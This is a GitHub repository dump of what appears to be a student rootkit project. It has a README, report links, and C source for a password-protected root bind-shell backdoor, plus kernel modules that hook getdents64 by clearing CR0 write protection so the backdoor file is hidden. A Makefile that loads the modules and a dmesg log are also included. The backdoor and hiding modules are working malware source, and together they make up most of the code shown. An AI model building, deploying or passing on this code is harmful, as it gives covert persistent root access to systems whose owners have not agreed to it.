├── README.md ├── documents ├── Linux下Rootkit工具集开发_需求报告.doc ├── Linux环境中Rootkit工具集及检测攻击分析对比与Rootkit工具集开发.doc ├── rootkit中期ppt.ppt ├── rootkit中期调研报告.doc ├── rootkit开题ppt.ppt ├── rootkit开题报告.doc ├── rootkit录屏ppt.ppt └── rootkit结题ppt.ppt └── src ├── bkdr ├── Backdoor └── Backdoor.c ├── ls ├── Makefile ├── Module.symvers ├── hidels.c ├── hidels.ko ├── hidels.mod.c ├── hidels.mod.o ├── hidels.o ├── hidels_huabei.c ├── mesg.txt └── modules.order ├── netstat ├── Makefile ├── Module.symvers ├── hidens.c ├── hidens.ko ├── hidens.mod.c ├── hidens.mod.o ├── hidens.o └── modules.order └── ps ├── Makefile ├── Module.symvers ├── hideps.c ├── hideps.ko ├── hideps.mod.c ├── hideps.mod.o ├── hideps.o └── modules.order /README.md: -------------------------------------------------------------------------------- 1 | #Rootkit工程实践 2 | 本仓库保存了研一阶段工程实践,rootkit研究与设计的相关文档和源代码,需要进行相关编译后才能在内核中使用。 3 | 4 | ##documents文件夹 5 | 存储工程实践中的相关文档,如开题,中期,以及结题报告。 6 | 7 | ##src文件夹 8 | 存储相关的源代码,不同文件夹中的代码实现了不同的功能。 9 | 10 | ###src/bkdr 11 | 后门程序,能够通过socket让外部访问者连接宿主计算机,通过输入账号密码进行登录,获取root权限。 12 | 13 | ###src/ls 14 | 文件系统隐藏,能够隐藏存在于宿主机上的后门文件,通过劫持ls程序中读取文件目录项的系统调用,修改系统调用的输出结果,删除其中的特征文件,从而实现文件系统中的隐藏。 15 | 16 | ###src/netstat 17 | 端口信息隐藏,能够隐藏后门程序打开的端口信息,通过劫持netstat程序中读取/proc/net/tcp以及udp文件中的信息,修改系统调用的输出结果,删除其中的特征端口,从而实现端口的隐藏。 18 | 19 | ###src/ps 20 | 进程信息的隐藏,能够隐藏后门程序的进程信息,通过劫持ps的系统调用,对proc中进程结构体的修改,修改系统调用的输出结果,删除指定进程信息,从而实现进程的隐藏。 -------------------------------------------------------------------------------- /documents/Linux下Rootkit工具集开发_需求报告.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/Linux下Rootkit工具集开发_需求报告.doc -------------------------------------------------------------------------------- /documents/Linux环境中Rootkit工具集及检测攻击分析对比与Rootkit工具集开发.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/Linux环境中Rootkit工具集及检测攻击分析对比与Rootkit工具集开发.doc -------------------------------------------------------------------------------- /documents/rootkit中期ppt.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit中期ppt.ppt -------------------------------------------------------------------------------- /documents/rootkit中期调研报告.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit中期调研报告.doc -------------------------------------------------------------------------------- /documents/rootkit开题ppt.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit开题ppt.ppt -------------------------------------------------------------------------------- /documents/rootkit开题报告.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit开题报告.doc -------------------------------------------------------------------------------- /documents/rootkit录屏ppt.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit录屏ppt.ppt -------------------------------------------------------------------------------- /documents/rootkit结题ppt.ppt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/documents/rootkit结题ppt.ppt -------------------------------------------------------------------------------- /src/bkdr/Backdoor: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/bkdr/Backdoor -------------------------------------------------------------------------------- /src/bkdr/Backdoor.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #define ENTERPASS "Enter your password: (exit for exit)" 10 | #define WELCOME "Welcome to shell\r\nlet's do it:\r\n" 11 | #define PASSWORD "cnbct" 12 | #define EXITCODE "exit" 13 | //参数1为端口号 14 | //我们的程序相当于一个运行在宿主机上的服务器,接受我们的命令输入 15 | int main(int argc, char **argv) 16 | { 17 | struct sockaddr_in s_addr; 18 | struct sockaddr_in c_addr; 19 | char buf[1024]; 20 | pid_t pid; 21 | int sock_descriptor,temp_sock_descriptor,c_addrsize; 22 | //int temp_sock_descriptor; 23 | setuid(0); 24 | setgid(0); 25 | seteuid(0); 26 | setegid(0); 27 | //若非两个参数,则报错 28 | if (argc!=2) 29 | { 30 | printf("=================================\r\n"); 31 | printf("|xbind.c by xy7[B.C.T]\r\n"); 32 | printf("|Usage:\r\n"); 33 | printf("|./xbind 1985\r\n"); 34 | printf("|nc -vv targetIP 1985\r\n"); 35 | printf("|enter the password to get shell\r\n"); 36 | printf("|Have a nice day;)\r\n"); 37 | printf("=================================\r\n"); 38 | exit(1); 39 | } 40 | signal(SIGCHLD, SIG_IGN);// ignore the death of child process 41 | //pid = fork(); 42 | if (fork()) 43 | { 44 | //父进程执行,然后子进程开始,爷进程结束 45 | //printf("GrandPa pid :%d\n",getpid()); 46 | exit(0); 47 | } 48 | //以下是子进程的代码 49 | //这个socket是TCP模式的 50 | //sock_descriptor=socket(AF_INET,SOCK_STREAM,0); 51 | //若socket创建失败,则退出 52 | if ((sock_descriptor=socket(AF_INET,SOCK_STREAM,0))==-1) 53 | { 54 | printf("socket failed!\n"); 55 | exit(1); 56 | } 57 | memset(&s_addr,0,sizeof(s_addr)); 58 | //zero(&s_addr,sizeof(s_addr)); 59 | //设置服务器协议,IP和端口 60 | s_addr.sin_family=AF_INET; 61 | s_addr.sin_addr.s_addr=htonl(INADDR_ANY); 62 | s_addr.sin_port=htons(atoi(argv[1])); 63 | //将socket与服务器地址信息绑定 64 | if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1) 65 | { 66 | printf("bind failed!\n"); 67 | exit(1); 68 | } 69 | //socket开启监听模式,最多可监听连接数为20 70 | if (listen(sock_descriptor,20)==-1)//accept 20 connections 71 | { 72 | printf("listen failed!\n"); 73 | exit(1); 74 | } 75 | c_addrsize=sizeof(c_addr); 76 | //我们的程序相当于一个运行在宿主机上的服务器,接受我们的命令输入。因此客户端信息为空代表任意客户端 77 | //temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize); 78 | //recv 79 | 80 | while(1) 81 | { 82 | temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize); 83 | //i++; 84 | pid=fork(); 85 | //父进程创建新进程,开启分段执行 86 | if (pid>0) 87 | { 88 | //父进程执行,返回子进程pid 89 | //printf("PaPa pid :%d\n",getpid()); 90 | close(temp_sock_descriptor); 91 | //exit(0); 92 | } 93 | else if (pid==0) 94 | { 95 | //子进程执行,返回0 96 | //输出 请输入密码 97 | //printf("Child pid :%d\n",getpid()); 98 | close(sock_descriptor); 99 | write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS)); 100 | memset(buf, '\0', 1024); 101 | //读入密码 102 | recv(temp_sock_descriptor, buf, 1024, 0); 103 | if(strncmp(buf,EXITCODE,4)==0){ 104 | write(temp_sock_descriptor, "exit\n", 5); 105 | close(temp_sock_descriptor); 106 | exit(0); 107 | } 108 | 109 | if (strncmp(buf,PASSWORD,5) !=0) 110 | { 111 | //密码错误,结束子进程 112 | write(temp_sock_descriptor, "pass error\n", 11); 113 | close(temp_sock_descriptor); 114 | exit(1); 115 | } 116 | 117 | //输出欢迎信息 118 | write(temp_sock_descriptor, WELCOME, strlen(WELCOME)); 119 | //复制文件描述符 120 | //将 文件描述符0,1,2都关闭,然后指向temp,temp文件的引用计数为4 121 | dup2(temp_sock_descriptor,0); 122 | dup2(temp_sock_descriptor,1); 123 | dup2(temp_sock_descriptor,2); 124 | //打开一个root shell 125 | execl("/bin/sh", "sh", (char *) 0); 126 | //printf("shell close\n"); 127 | 128 | //关闭temp,不过文件描述符0,1,2都指向.temp引用计数为3 129 | 130 | //write(temp_sock_descriptor, "loc1", 4); 131 | close(temp_sock_descriptor); 132 | exit(0); 133 | } 134 | else 135 | { 136 | exit(1); 137 | } 138 | } 139 | close(sock_descriptor); 140 | return 0; 141 | } 142 | -------------------------------------------------------------------------------- /src/ls/Makefile: -------------------------------------------------------------------------------- 1 | LS = hidels 2 | #PS = hideps 3 | #NETSTAT = hidens 4 | #MOD = hidemod 5 | 6 | KDIR =/usr/src/linux-headers-$(shell uname -r) 7 | 8 | PWD := $(shell pwd) 9 | 10 | obj-m +=$(LS).o 11 | #obj-m +=$(PS).o 12 | #obj-m +=$(NETSTAT).o 13 | 14 | 15 | default: 16 | make -C $(KDIR) M=$(PWD) modules 17 | 18 | 19 | clean: 20 | rm -rf *.o *.ko Module.symvers modules.order *.mod.c *.mod.o 21 | 22 | install: 23 | sudo insmod $(LS).ko 24 | # sudo insmod $(PS).ko 25 | # sudo insmod $(NETSTAT).ko 26 | # ./Backdoor 8023 27 | 28 | 29 | lsmod: 30 | sudo lsmod|grep $(LS) #$(PS) $(NETSTAT) 31 | 32 | uninstall: 33 | sudo rmmod $(LS) 34 | -------------------------------------------------------------------------------- /src/ls/Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ls/Module.symvers -------------------------------------------------------------------------------- /src/ls/hidels.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | //#include 14 | //#include 15 | #define CALLOFF 100 16 | 17 | 18 | int orig_cr0; 19 | //char psname[10]="test1"; 20 | char psname[10]="Backdoor"; 21 | char *processname=psname; 22 | 23 | //module_param(processname, charp, 0); 24 | struct { 25 | unsigned short limit; 26 | unsigned int base; 27 | } __attribute__ ((packed)) idtr; 28 | 29 | struct { 30 | unsigned short off1; 31 | unsigned short sel; 32 | unsigned char none,flags; 33 | unsigned short off2; 34 | } __attribute__ ((packed)) * idt; 35 | 36 | struct linux_dirent{ 37 | unsigned long d_ino; 38 | unsigned long d_off; 39 | unsigned short d_reclen; 40 | char* d_name; 41 | }; 42 | 43 | void** sys_call_table; 44 | 45 | unsigned int clear_and_return_cr0(void) 46 | { 47 | unsigned int cr0 = 0; 48 | unsigned int ret; 49 | 50 | asm volatile ("movl %%cr0, %%eax" 51 | : "=a"(cr0) 52 | ); 53 | ret = cr0; 54 | 55 | /*clear the 20th bit of CR0,*/ 56 | cr0 &= 0xfffeffff; 57 | asm volatile ("movl %%eax, %%cr0" 58 | : 59 | : "a"(cr0) 60 | ); 61 | return ret; 62 | } 63 | 64 | void setback_cr0(unsigned int val) 65 | { 66 | asm volatile ("movl %%eax, %%cr0" 67 | : 68 | : "a"(val) 69 | ); 70 | } 71 | 72 | 73 | asmlinkage long (*orig_getdents64)(unsigned int fd, 74 | struct linux_dirent64 __user *dirp, unsigned int count); 75 | 76 | char * findoffset(char *start) 77 | { 78 | char *p; 79 | for (p = start; p < start + CALLOFF; p++) 80 | if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85') 81 | return p; 82 | return NULL; 83 | } 84 | 85 | 86 | 87 | asmlinkage long hacked_getdents64(unsigned int fd, 88 | struct linux_dirent64 __user *dirp, unsigned int count) 89 | { 90 | //added by lsc for process 91 | long value; 92 | // struct inode *dinode; 93 | unsigned short len = 0; 94 | unsigned short tlen = 0; 95 | // struct linux_dirent *mydir = NULL; 96 | //end 97 | value = (*orig_getdents64) (fd, dirp, count); 98 | tlen = value; 99 | while(tlen > 0) 100 | { 101 | len = dirp->d_reclen; 102 | tlen = tlen - len; 103 | printk("%s\n",dirp->d_name); 104 | 105 | if(strstr(dirp->d_name,processname) ) 106 | { 107 | printk("find process\n"); 108 | memmove(dirp, (char *) dirp + dirp->d_reclen, tlen); 109 | value = value - len; 110 | printk(KERN_INFO "hide successful.\n"); 111 | } 112 | else{ 113 | if(tlen) 114 | dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen); 115 | } 116 | } 117 | printk(KERN_INFO "finished hacked_getdents64.\n"); 118 | return value; 119 | } 120 | 121 | 122 | void **get_sct_addr(void) 123 | { 124 | unsigned sys_call_off; 125 | unsigned sct = 0; 126 | char *p; 127 | asm("sidt %0":"=m"(idtr)); 128 | idt = (void *) (idtr.base + 8 * 0x80); 129 | sys_call_off = (idt->off2 << 16) | idt->off1; 130 | if ((p = findoffset((char *) sys_call_off))) 131 | sct = *(unsigned *) (p + 3); 132 | return ((void **)sct); 133 | } 134 | 135 | 136 | static int filter_init(void) 137 | { 138 | sys_call_table = get_sct_addr(); 139 | if (!sys_call_table) 140 | { 141 | printk("get_sct_addr(): NULL...\n"); 142 | return 0; 143 | } 144 | else 145 | printk("sct: 0x%x\n\n\n\n\n\n", (unsigned int)sys_call_table); 146 | orig_getdents64 = sys_call_table[__NR_getdents64]; 147 | printk("offset: 0x%x\n\n\n\n",(unsigned int)orig_getdents64); 148 | orig_cr0 = clear_and_return_cr0(); 149 | sys_call_table[__NR_getdents64] = hacked_getdents64; 150 | printk("hacked_getdents64: 0x%x\n\n\n\n",(unsigned int)hacked_getdents64); 151 | setback_cr0(orig_cr0); 152 | 153 | printk(KERN_INFO "hidels: module loaded.\n"); 154 | return 0; 155 | } 156 | 157 | 158 | static void filter_exit(void) 159 | { 160 | orig_cr0 = clear_and_return_cr0(); 161 | if (sys_call_table) 162 | sys_call_table[__NR_getdents64] = orig_getdents64; 163 | setback_cr0(orig_cr0); 164 | printk(KERN_INFO "hidels: module removed\n"); 165 | } 166 | module_init(filter_init); 167 | module_exit(filter_exit); 168 | MODULE_LICENSE("GPL"); 169 | -------------------------------------------------------------------------------- /src/ls/hidels.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ls/hidels.ko -------------------------------------------------------------------------------- /src/ls/hidels.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | .arch = MODULE_ARCH_INIT, 15 | }; 16 | 17 | static const struct modversion_info ____versions[] 18 | __used 19 | __attribute__((section("__versions"))) = { 20 | { 0x15b2dc7b, "module_layout" }, 21 | { 0x8235805b, "memmove" }, 22 | { 0x1e6d26a8, "strstr" }, 23 | { 0x50eedeb8, "printk" }, 24 | { 0xb4390f9a, "mcount" }, 25 | }; 26 | 27 | static const char __module_depends[] 28 | __used 29 | __attribute__((section(".modinfo"))) = 30 | "depends="; 31 | 32 | 33 | MODULE_INFO(srcversion, "0A3AAB63F210EF5F701563B"); 34 | -------------------------------------------------------------------------------- /src/ls/hidels.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ls/hidels.mod.o -------------------------------------------------------------------------------- /src/ls/hidels.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/warcraft23/RootkitDemo/fda5751c72a5792ecc39967864a98622cace23e8/src/ls/hidels.o -------------------------------------------------------------------------------- /src/ls/hidels_huabei.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | //#include 14 | //#include 15 | #define CALLOFF 100 16 | 17 | 18 | int orig_cr0; 19 | //char psname[10]="test1"; 20 | char psname[10]="Backdoor"; 21 | char *processname=psname; 22 | 23 | //module_param(processname, charp, 0); 24 | struct { 25 | unsigned short limit; 26 | unsigned int base; 27 | } __attribute__ ((packed)) idtr; 28 | 29 | struct { 30 | unsigned short off1; 31 | unsigned short sel; 32 | unsigned char none,flags; 33 | unsigned short off2; 34 | } __attribute__ ((packed)) * idt; 35 | 36 | struct linux_dirent{ 37 | unsigned long d_ino; 38 | unsigned long d_off; 39 | unsigned short d_reclen; 40 | char* d_name; 41 | }; 42 | 43 | void** sys_call_table; 44 | 45 | unsigned int clear_and_return_cr0(void) 46 | { 47 | unsigned int cr0 = 0; 48 | unsigned int ret; 49 | 50 | asm volatile ("movl %%cr0, %%eax" 51 | : "=a"(cr0) 52 | ); 53 | ret = cr0; 54 | 55 | /*clear the 20th bit of CR0,*/ 56 | cr0 &= 0xfffeffff; 57 | asm volatile ("movl %%eax, %%cr0" 58 | : 59 | : "a"(cr0) 60 | ); 61 | return ret; 62 | } 63 | 64 | void setback_cr0(unsigned int val) 65 | { 66 | asm volatile ("movl %%eax, %%cr0" 67 | : 68 | : "a"(val) 69 | ); 70 | } 71 | 72 | 73 | asmlinkage long (*orig_getdents64)(unsigned int fd, 74 | struct linux_dirent64 __user *dirp, unsigned int count); 75 | 76 | char * findoffset(char *start) 77 | { 78 | char *p; 79 | for (p = start; p < start + CALLOFF; p++) 80 | if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85') 81 | return p; 82 | return NULL; 83 | } 84 | 85 | 86 | 87 | asmlinkage long hacked_getdents64(unsigned int fd, 88 | struct linux_dirent64 __user *dirp, unsigned int count) 89 | { 90 | //added by lsc for process 91 | long value; 92 | // struct inode *dinode; 93 | unsigned short len = 0; 94 | unsigned short tlen = 0; 95 | // struct linux_dirent *mydir = NULL; 96 | //end 97 | value = (*orig_getdents64) (fd, dirp, count); 98 | tlen = value; 99 | while(tlen > 0) 100 | { 101 | len = dirp->d_reclen; 102 | tlen = tlen - len; 103 | printk("%s\n",dirp->d_name); 104 | 105 | if(strstr(dirp->d_name,processname) ) 106 | { 107 | printk("find process\n"); 108 | memmove(dirp, (char *) dirp + dirp->d_reclen, tlen); 109 | value = value - len; 110 | printk(KERN_INFO "hide successful.\n"); 111 | } 112 | 113 | if(tlen) 114 | dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen); 115 | } 116 | printk(KERN_INFO "finished hacked_getdents64.\n"); 117 | return value; 118 | } 119 | 120 | 121 | void **get_sct_addr(void) 122 | { 123 | unsigned sys_call_off; 124 | unsigned sct = 0; 125 | char *p; 126 | asm("sidt %0":"=m"(idtr)); 127 | idt = (void *) (idtr.base + 8 * 0x80); 128 | sys_call_off = (idt->off2 << 16) | idt->off1; 129 | if ((p = findoffset((char *) sys_call_off))) 130 | sct = *(unsigned *) (p + 3); 131 | return ((void **)sct); 132 | } 133 | 134 | 135 | static int filter_init(void) 136 | { 137 | sys_call_table = get_sct_addr(); 138 | if (!sys_call_table) 139 | { 140 | printk("get_sct_addr(): NULL...\n"); 141 | return 0; 142 | } 143 | else 144 | printk("sct: 0x%x\n\n\n\n\n\n", (unsigned int)sys_call_table); 145 | orig_getdents64 = sys_call_table[__NR_getdents64]; 146 | printk("offset: 0x%x\n\n\n\n",(unsigned int)orig_getdents64); 147 | orig_cr0 = clear_and_return_cr0(); 148 | sys_call_table[__NR_getdents64] = hacked_getdents64; 149 | setback_cr0(orig_cr0); 150 | printk(KERN_INFO "hidels: module loaded.\n"); 151 | return 0; 152 | } 153 | 154 | 155 | static void filter_exit(void) 156 | { 157 | orig_cr0 = clear_and_return_cr0(); 158 | if (sys_call_table) 159 | sys_call_table[__NR_getdents64] = orig_getdents64; 160 | setback_cr0(orig_cr0); 161 | printk(KERN_INFO "hidels: module removed\n"); 162 | } 163 | module_init(filter_init); 164 | module_exit(filter_exit); 165 | MODULE_LICENSE("GPL"); 166 | -------------------------------------------------------------------------------- /src/ls/mesg.txt: -------------------------------------------------------------------------------- 1 | [ 2.925061] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7] 2 | [ 2.925069] pci_bus 0000:00: root bus resource [io 0x0d00-0xfeff] 3 | [ 2.928639] pci 0000:00:00.0: [8086:7190] type 00 class 0x060000 4 | [ 2.931859] pci 0000:00:01.0: [8086:7191] type 01 class 0x060400 5 | [ 2.932770] pci 0000:00:07.0: [8086:7110] type 00 class 0x060100 6 | [ 2.933502] pci 0000:00:07.1: [8086:7111] type 00 class 0x01018a 7 | [ 2.969754] pci 0000:00:07.1: reg 20: [io 0x10c0-0x10cf] 8 | [ 2.971132] pci 0000:00:07.3: [8086:7113] type 00 class 0x068000 9 | [ 2.974243] pci 0000:00:07.3: quirk: [io 0x1000-0x103f] claimed by PIIX4 ACPI 10 | [ 2.974317] pci 0000:00:07.3: quirk: [io 0x1040-0x104f] claimed by PIIX4 SMB 11 | [ 2.974978] pci 0000:00:07.7: [15ad:0740] type 00 class 0x088000 12 | [ 2.976249] pci 0000:00:07.7: reg 10: [io 0x1080-0x10bf] 13 | [ 2.977642] pci 0000:00:07.7: reg 14: [mem 0xc8000000-0xc8001fff 64bit] 14 | [ 2.982017] pci 0000:00:0f.0: [15ad:0405] type 00 class 0x030000 15 | [ 2.984482] pci 0000:00:0f.0: reg 10: [io 0x10d0-0x10df] 16 | [ 3.019923] pci 0000:00:0f.0: reg 14: [mem 0xd0000000-0xd7ffffff pref] 17 | [ 3.022833] pci 0000:00:0f.0: reg 18: [mem 0xc8800000-0xc8ffffff] 18 | [ 3.034040] pci 0000:00:0f.0: reg 30: [mem 0x00000000-0x00007fff pref] 19 | [ 3.034423] pci 0000:00:10.0: [1000:0030] type 00 class 0x010000 20 | [ 3.035720] pci 0000:00:10.0: reg 10: [io 0x1400-0x14ff] 21 | [ 3.070257] pci 0000:00:10.0: reg 14: [mem 0xc8040000-0xc805ffff 64bit] 22 | [ 3.071973] pci 0000:00:10.0: reg 1c: [mem 0xc8020000-0xc803ffff 64bit] 23 | [ 3.073901] pci 0000:00:10.0: reg 30: [mem 0x00000000-0x00003fff pref] 24 | [ 3.074111] pci 0000:00:11.0: [15ad:0790] type 01 class 0x060401 25 | [ 3.078349] pci 0000:00:15.0: [15ad:07a0] type 01 class 0x060400 26 | [ 3.079622] pci 0000:00:15.0: PME# supported from D0 D3hot D3cold 27 | [ 3.080228] pci 0000:00:15.1: [15ad:07a0] type 01 class 0x060400 28 | [ 3.081108] pci 0000:00:15.1: PME# supported from D0 D3hot D3cold 29 | [ 3.081405] pci 0000:00:15.2: [15ad:07a0] type 01 class 0x060400 30 | [ 3.082234] pci 0000:00:15.2: PME# supported from D0 D3hot D3cold 31 | [ 3.082524] pci 0000:00:15.3: [15ad:07a0] type 01 class 0x060400 32 | [ 3.083377] pci 0000:00:15.3: PME# supported from D0 D3hot D3cold 33 | [ 3.083684] pci 0000:00:15.4: [15ad:07a0] type 01 class 0x060400 34 | [ 3.084577] pci 0000:00:15.4: PME# supported from D0 D3hot D3cold 35 | [ 3.084869] pci 0000:00:15.5: [15ad:07a0] type 01 class 0x060400 36 | [ 3.085678] pci 0000:00:15.5: PME# supported from D0 D3hot D3cold 37 | [ 3.119280] pci 0000:00:15.6: [15ad:07a0] type 01 class 0x060400 38 | [ 3.120197] pci 0000:00:15.6: PME# supported from D0 D3hot D3cold 39 | [ 3.120494] pci 0000:00:15.7: [15ad:07a0] type 01 class 0x060400 40 | [ 3.121326] pci 0000:00:15.7: PME# supported from D0 D3hot D3cold 41 | [ 3.121617] pci 0000:00:16.0: [15ad:07a0] type 01 class 0x060400 42 | [ 3.122472] pci 0000:00:16.0: PME# supported from D0 D3hot D3cold 43 | [ 3.122762] pci 0000:00:16.1: [15ad:07a0] type 01 class 0x060400 44 | [ 3.123584] pci 0000:00:16.1: PME# supported from D0 D3hot D3cold 45 | [ 3.123873] pci 0000:00:16.2: [15ad:07a0] type 01 class 0x060400 46 | [ 3.126388] pci 0000:00:16.2: PME# supported from D0 D3hot D3cold 47 | [ 3.126698] pci 0000:00:16.3: [15ad:07a0] type 01 class 0x060400 48 | [ 3.128224] pci 0000:00:16.3: PME# supported from D0 D3hot D3cold 49 | [ 3.128595] pci 0000:00:16.4: [15ad:07a0] type 01 class 0x060400 50 | [ 3.131083] pci 0000:00:16.4: PME# supported from D0 D3hot D3cold 51 | [ 3.131394] pci 0000:00:16.5: [15ad:07a0] type 01 class 0x060400 52 | [ 3.132903] pci 0000:00:16.5: PME# supported from D0 D3hot D3cold 53 | [ 3.133240] pci 0000:00:16.6: [15ad:07a0] type 01 class 0x060400 54 | [ 3.134080] pci 0000:00:16.6: PME# supported from D0 D3hot D3cold 55 | [ 3.134373] pci 0000:00:16.7: [15ad:07a0] type 01 class 0x060400 56 | [ 3.135202] pci 0000:00:16.7: PME# supported from D0 D3hot D3cold 57 | [ 3.135494] pci 0000:00:17.0: [15ad:07a0] type 01 class 0x060400 58 | [ 3.169664] pci 0000:00:17.0: PME# supported from D0 D3hot D3cold 59 | [ 3.169957] pci 0000:00:17.1: [15ad:07a0] type 01 class 0x060400 60 | [ 3.170841] pci 0000:00:17.1: PME# supported from D0 D3hot D3cold 61 | [ 3.171133] pci 0000:00:17.2: [15ad:07a0] type 01 class 0x060400 62 | [ 3.171952] pci 0000:00:17.2: PME# supported from D0 D3hot D3cold 63 | [ 3.172243] pci 0000:00:17.3: [15ad:07a0] type 01 class 0x060400 64 | [ 3.173058] pci 0000:00:17.3: PME# supported from D0 D3hot D3cold 65 | [ 3.173548] pci 0000:00:17.4: [15ad:07a0] type 01 class 0x060400 66 | [ 3.174415] pci 0000:00:17.4: PME# supported from D0 D3hot D3cold 67 | [ 3.178750] pci 0000:00:17.5: [15ad:07a0] type 01 class 0x060400 68 | [ 3.179638] pci 0000:00:17.5: PME# supported from D0 D3hot D3cold 69 | [ 3.179963] pci 0000:00:17.6: [15ad:07a0] type 01 class 0x060400 70 | [ 3.183043] pci 0000:00:17.6: PME# supported from D0 D3hot D3cold 71 | [ 3.183360] pci 0000:00:17.7: [15ad:07a0] type 01 class 0x060400 72 | [ 3.184446] pci 0000:00:17.7: PME# supported from D0 D3hot D3cold 73 | [ 3.184854] pci 0000:00:18.0: [15ad:07a0] type 01 class 0x060400 74 | [ 3.220567] pci 0000:00:18.0: PME# supported from D0 D3hot D3cold 75 | [ 3.220882] pci 0000:00:18.1: [15ad:07a0] type 01 class 0x060400 76 | [ 3.221739] pci 0000:00:18.1: PME# supported from D0 D3hot D3cold 77 | [ 3.222034] pci 0000:00:18.2: [15ad:07a0] type 01 class 0x060400 78 | [ 3.223016] pci 0000:00:18.2: PME# supported from D0 D3hot D3cold 79 | [ 3.223311] pci 0000:00:18.3: [15ad:07a0] type 01 class 0x060400 80 | [ 3.224201] pci 0000:00:18.3: PME# supported from D0 D3hot D3cold 81 | [ 3.224490] pci 0000:00:18.4: [15ad:07a0] type 01 class 0x060400 82 | [ 3.227476] pci 0000:00:18.4: PME# supported from D0 D3hot D3cold 83 | [ 3.227811] pci 0000:00:18.5: [15ad:07a0] type 01 class 0x060400 84 | [ 3.228787] pci 0000:00:18.5: PME# supported from D0 D3hot D3cold 85 | [ 3.229083] pci 0000:00:18.6: [15ad:07a0] type 01 class 0x060400 86 | [ 3.229920] pci 0000:00:18.6: PME# supported from D0 D3hot D3cold 87 | [ 3.230217] pci 0000:00:18.7: [15ad:07a0] type 01 class 0x060400 88 | [ 3.231197] pci 0000:00:18.7: PME# supported from D0 D3hot D3cold 89 | [ 3.232800] pci 0000:00:01.0: PCI bridge to [bus 01] 90 | [ 3.233692] pci 0000:02:00.0: [15ad:0774] type 00 class 0x0c0300 91 | [ 3.269707] pci 0000:02:00.0: reg 20: [io 0x20c0-0x20df] 92 | [ 3.270765] pci 0000:02:01.0: [1022:2000] type 00 class 0x020000 93 | [ 3.271290] pci 0000:02:01.0: reg 10: [io 0x2000-0x207f] 94 | [ 3.275205] pci 0000:02:01.0: reg 30: [mem 0x00000000-0x0000ffff pref] 95 | [ 3.275431] pci 0000:02:02.0: [1274:1371] type 00 class 0x040100 96 | [ 3.276650] pci 0000:02:02.0: reg 10: [io 0x2080-0x20bf] 97 | [ 3.280239] pci 0000:02:03.0: [15ad:0770] type 00 class 0x0c0320 98 | [ 3.280680] pci 0000:02:03.0: reg 10: [mem 0xc9000000-0xc9000fff] 99 | [ 3.283286] pci 0000:00:11.0: PCI bridge to [bus 02] (subtractive decode) 100 | [ 3.283404] pci 0000:00:11.0: bridge window [io 0x2000-0x3fff] 101 | [ 3.283484] pci 0000:00:11.0: bridge window [mem 0xc9000000-0xca3fffff] 102 | [ 3.283655] pci 0000:00:11.0: bridge window [mem 0xd8400000-0xd89fffff 64bit pref] 103 | [ 3.283726] pci 0000:00:11.0: bridge window [mem 0x000a0000-0x000bffff] (subtractive decode) 104 | [ 3.283736] pci 0000:00:11.0: bridge window [mem 0x000cc000-0x000cffff] (subtractive decode) 105 | [ 3.283743] pci 0000:00:11.0: bridge window [mem 0x000d0000-0x000d3fff] (subtractive decode) 106 | [ 3.283751] pci 0000:00:11.0: bridge window [mem 0x000d4000-0x000d7fff] (subtractive decode) 107 | [ 3.283758] pci 0000:00:11.0: bridge window [mem 0x000d8000-0x000dbfff] (subtractive decode) 108 | [ 3.283765] pci 0000:00:11.0: bridge window [mem 